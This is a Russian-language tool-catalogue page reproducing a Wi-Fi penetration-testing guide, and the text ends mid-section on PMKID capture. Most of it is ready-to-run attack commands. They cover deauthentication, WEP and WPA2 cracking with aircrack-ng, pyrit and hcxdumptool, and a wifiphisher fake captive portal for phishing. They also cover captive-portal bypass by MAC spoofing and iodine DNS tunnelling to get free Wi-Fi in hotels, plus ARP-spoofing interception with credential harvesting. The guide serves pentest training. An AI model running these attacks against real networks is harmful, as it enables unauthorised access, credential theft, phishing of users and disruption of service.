Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
wifi-pentesting-guide — Руководство по тестированию на проникновение Wi-Fi | Kitploit
Инструменты/GitHubGitHub/ricardojoserf/wifi-pentesting-guide
Взлом паролейАудит Wi-FiСбор информацииПост-эксплуатацияБезопасность беспроводных сетейТестирование на ПроникновениеСоциальная инженерияОбучение и Образование

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
ricardojoserf/wifi-pentesting-guide

wifi-pentesting-guide

Руководство по тестированию на проникновение Wi-Fi

РепозиторийСайт
734113372 лет назадПроверено Kitploit

Руководство по тестированию проникновения в WiFi

Содержание

  1. Основные команды

  2. Открытые сети

    2.1. Порталы авторизации

    2.2. Атака «Человек посередине»

  3. Взлом WEP

    3.1. Без клиентов

  4. Взлом WPA2-PSK

    4.1. Взлом 4-стороннего рукопожатия

    4.2. Атака PMKID

    4.3. Атака без точки доступа

  5. WPA2-Enterprise

    5.1. Поддельные точки доступа

    5.2. Полный перебор

    5.3. Поддерживаемые методы EAP

  6. Другие атаки

    6.1. Krack Attack и Frag Attack

    6.2. OSINT

    6.3. Глушение WiFi

    6.4. Другие фреймворки

  7. Пост-эксплуатация

    7.1. Атака на маршрутизатор

    7.2. Типы сканеров

    7.3. Спуфинг



1. Основные команды

Установить переменную окружения

VARIABLE=value

Проверить режим интерфейса

iwconfig $IFACE

Проверить статус интерфейса

ifconfig $IFACE

Установить режим монитора

airmon-ng check kill
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE up

Список сетей

  1. Установите режим монитора

  2. Запустите Airodump-ng

airodump-ng $IFACE -c $CHANNEL -e $ESSID

Деаутентификация

  1. Только один клиент
 aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
  1. Точка доступа (= все клиенты в этой точке доступа)
 aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE

Получить скрытый SSID с клиентами

  1. Список сетей

Составьте список сетей с помощью Airodump-ng и получите MAC-адрес точки доступа ($AP_MAC) и одного из клиентов ($CLIENT_MAC). Не останавливайте захват.

  1. Деаутентифицируйте

В другом терминале деаутентифицируйте одного или всех клиентов. Когда Airodump-ng захватит рукопожатие от этой сети, имя или ESSID появится в первом терминале:

aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE

Получить скрытый SSID без клиентов

  1. Список сетей

Составьте список сетей с помощью Airodump-ng и получите MAC-адрес точки доступа ($AP_MAC) и одного из клиентов ($CLIENT_MAC). Не останавливайте захват.

2.a. Выполните атаку по словарю

mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH

2.b. Или выполните атаку полным перебором

mdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET

Для набора символов можно использовать l (строчные буквы), u (заглавные буквы), n (цифры), c (строчные+заглавные), m (строчные+заглавные+цифры) или a (все печатные символы).



2. Открытые сети

2.1. Порталы авторизации

2.1.1. Поддельные порталы авторизации

  1. Клонируйте сайт с помощью HTTrack

  2. Установите Wifiphiser. Поместите результат HTTrack в новую папку wifiphisher/data/phishing-pages/new_page/html и файл конфигурации в wifiphisher/data/phishing-pages/new_page/config.ini.

  3. Перекомпилируйте проект с помощью python setup.py install или бинарника в bin.

  4. Эта команда корректно работает в последней версии Kali после установки hostapd:

cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE

2.1.2. Обход 1: MAC-спуфинг

Первый метод обхода портала авторизации — изменить ваш MAC-адрес на адрес уже авторизованного пользователя.

  1. Просканируйте сеть и получите список IP- и MAC-адресов. Вы можете использовать:
  • nmap

  • Пользовательский скрипт, например этот (Bash) или этот (Python)

  1. Измените ваш IP- и MAC-адрес. Вы можете использовать:
  • macchanger

  • Пользовательский скрипт, например этот(Bash)

Также можно использовать скрипты для автоматизации процесса, например:

  • Скрипт Poliva

  • Hackcaptiveportals


2.1.3. Обход 2: DNS-туннелирование

Второй метод — создание DNS-туннеля. Для этого необходимо иметь собственный доступный DNS-сервер. Вы можете использовать этот метод, чтобы обойти портал авторизации и получить «бесплатный» Wi-Fi в отелях, аэропортах и т.д.

  1. Проверьте, разрешаются ли доменные имена:
nslookup example.com
  1. Создайте 2 DNS-записи (в Digital ocean, Afraid.org...):
  • A-запись: dns.$DOMAIN, указывающая на $SERVER_IP (Пример: dns.domain.com 139.59.172.117)

  • NS-запись: hack.$DOMAIN, указывающая на dns.$DOMAIN (Пример: hack.domain.com dns.domain.com)

  1. Выполните на сервере
iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
  1. Проверьте, работает ли корректно здесь

  2. Выполните на клиенте

iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
  1. Создайте туннель
ssh -D 8080 [email protected]

2.2. Атака «Человек посередине»

После подключения к сети можно проверить, уязвима ли она для атак типа «Человек посередине».

  1. ARP-спуфинг с помощью Ettercap

  2. Перехват трафика с помощью Wireshark или TCPdump

  3. Анализ трафика с помощью PCredz (Linux) или Network Miner (Windows)



3. Взлом WEP

  1. Запустите захват
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
  1. Ускорьте захват IV с помощью Поддельной аутентификации + Атаки повторной передачи ARP-запроса + Деаутентификации пользователя. Остановите Airodump примерно на 100,000 уникальных IV
aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
  1. Взломайте пароль с помощью Aircrack-ng
aircrack-ng $PCAP_FILE


4. Взлом WPA2-PSK

4.1. Взлом 4-стороннего рукопожатия

  1. Запустите захват
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
  1. Деаутентифицируйте пользователя. Остановите захват airodump, когда увидите сообщение 'WPA handshake: $MAC'
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
  1. Вариант 1: Взломайте рукопожатие с помощью Aircrack-ng
aircrack-ng -w $WORDLIST capture.cap

Списки слов можно получить здесь.

  1. Вариант 2: Взломайте рукопожатие с помощью Pyrit
pyrit -r $PCAP_FILE analyze
pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
pyrit -i $WORDLIST import_passwords
pyrit eval
pyrit batch
pyrit -r $CLEAN_PCAP_FILE attack_db

4.2. Атака PMKID

Вы можете использовать этот скрипт или выполнить следующие шаги:

  1. Установите Hcxdumptool и Hcxtool (можно использовать этот скрипт).

  2. Остановите Network Manager

airmon-ng check kill

3a. Если вы хотите атаковать конкретный MAC-адрес

  • Создайте текстовый файл ($FILTER_FILE) и добавьте MAC-адрес без ":". Вы можете использовать sed и перенаправить вывод в файл:
echo $MAC | sed 's/://g' > $FILTER_FILE
  • Захватите PMKID
hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2
  1. Создайте $HASH_FILE
Скачать инструмент